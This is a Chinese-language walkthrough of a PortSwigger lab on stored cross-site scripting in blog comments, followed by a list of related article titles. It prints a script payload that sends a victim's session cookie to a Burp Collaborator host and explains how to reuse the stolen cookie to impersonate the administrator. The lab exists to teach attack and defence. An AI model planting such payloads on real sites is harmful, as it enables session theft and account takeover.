靶场内容

本实验包含博客评论功能中的存储型 XSS漏洞。一个模拟的受害者用户在发布后查看所有评论。为解决实验室,利用该漏洞窃取受害者的会话cookie,然后使用该cookie来冒充受害者。

注意
为了防止 Academy 平台被用来攻击第三方,我们的防火墙会阻止实验室与任意外部系统之间的交互。要解决实验室问题,您应该使用 Burp Collaborator 的默认公共服务器 ( burpcollaborator.net)。

一些用户会注意到这个实验室有一个不需要 Burp Collaborator 的替代解决方案。然而,它远没有泄露 cookie 那么微妙。

解决方法

  • XSS窃取Cookie老生常谈了,最喜欢用的就是窃取Cookie了
  • 这个靶场还是很细的:
  • 找到一个评论区,将JavaScript代码复制到评论区
<script>
fetch('https://8r0adoyya8wnsy5t6m21h3twenkd82.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
  • fetch里面的URL内容是Burp Collaborator Client出来的payload
  • 之后打开Burp Collaborator Client,可以发现有个HTTP报文
  • 点开它,里面是管理员的session
  • 之后使用这个cookie去覆盖home页面的cookie就可以解决战斗了

Lab: Exploiting cross-site scripting to steal cookies:利用XSS窃取Cookie相关推荐

  1. XSSF - Cross Site Scripting Framework

    2019独角兽企业重金招聘Python工程师标准>>> 跨站脚本框架 (XSSF) 是一个设计用来快速发现网站存在XSS漏洞的一个安全工具集. 该项目是为了验证网站存在的XSS漏洞及 ...

  2. Cross Site Scripting DOM攻击jQuery append() 的处理方法

    做安全红线使用Fortify工具进行扫描时,jquery append会报Cross Site Scripting DOM风险.解决该问题有两种办法. 一.原生dom方式 使用JavaScript原生 ...

  3. 【常见Web应用安全问题】---1、Cross Site Scripting

    Web应用程序的安全性问题依其存在的形势划分,种类繁多,这里不准备介绍所有的,只介绍常见的一些.  常见Web应用安全问题安全性问题的列表: 1.跨站脚本攻击(CSS or XSS, Cross Si ...

  4. XSS(Cross Site Scripting)攻击简介

    环境 Ubuntu 22.04 IntelliJ IDEA 2022.1.3 JDK 17.0.3.1 Spring Boot 3.0.1 Firefox 108.0.2 问题和分析 在Intelli ...

  5. Reflected Cross Site Scripting (XSS)

    前言 反射型XSS, 即 Reflected Cross Site Scripting (XSS),  攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的 页 ...

  6. Xss-reflected/stored跨站脚本分析(Cross site scripting)

    Xss-reflected/stored跨站脚本分析(Cross site scripting) 基础知识 针对Dom - dochtml Url概念:协议+网址/dns+端口+路径 XSS原理:对U ...

  7. DVWA V1.9:Reflected Cross Site Scripting(存储型XSS)

    DVWA V1.9:Reflected Cross Site Scripting(存储型XSS) 存储型 XSS 介绍 Low 级别 核心代码 官方提示 漏洞利用 Medium 级别 核心代码 官方提 ...

  8. 靶场练习Exploiting cross-site scripting to steal cookies

    复制Burp Collaborator客户端中的地址 到网页的靶场把框中地址替换 将'修改过的的代码提交到网页,Burp Collaborator客户端中会出现HTTP请求,请求内容,还有盗取到的co ...

  9. CHECKMARX安全漏洞检测防止XSS(Cross Site Scripting)跨站脚本攻击

    CHECKMARX安全漏洞检测防止XSS跨站脚本攻击 总结CHECKMARX软件安全检测报告高危风险漏洞处理方式 高危警告内容 This can enable a Reflected Cross-Si ...

最新文章

  1. mysql select time,MySql查询时间段的方法
  2. 原型、原型对象、构造函数、原型链理解
  3. [C] 跨平台使用Intrinsic函数范例1——使用SSE、AVX指令集 处理 单精度浮点数组求和(支持vc、gcc,兼容Windows、Linux、Mac)...
  4. 【下一代核心技术DevOps】:(三)私有代码库阿里云Git使用
  5. 【转】C#实现SM3国密加密
  6. HTML5触摸事件演化tap事件
  7. SAP License:修改物料账期
  8. frobenius范数_非负矩阵之Perron-Frobenius定理
  9. vscode+leetcode环境配置
  10. docker容器资源配额控制
  11. python从入门到放弃-《Python3从入门到放弃》视频教程
  12. Servlet教程第5讲笔记
  13. 名编辑电子杂志大师教程 | 菜单设置
  14. HTML跳转页面指定位置的几种方法
  15. 华为查看mpls的命令_华为BGP基本命令
  16. 最简单的STM32入门教程----闪烁LED
  17. WebRTC的拥塞控制和带宽策略
  18. 记账本软件的用例描述
  19. 通信技术计算机技术合称为,通信技术、计算机技术和控制 技术合称为3C
  20. AMIGO小清新资讯(GBK+UTF)DZ仿flyme模板

热门文章

  1. markdown编辑语法基础篇
  2. 供应充电管理芯片BQ25619RTWR
  3. 随手拍能当副业靠谱不,每天拍车辆违规可以赚钱吗?
  4. matlab设置坐标轴/字体/颜色
  5. 用python写一个简单的文字识别器GUI
  6. 5月再出发,撸起袖子用心学!
  7. 汇编和c只有一步之近----小话c语言(19)
  8. 【综合案例】信用评分模型开发
  9. JavaScript使用RSA进行超长文本加解密
  10. 【自用】Jupyter Notebook好看主题的设置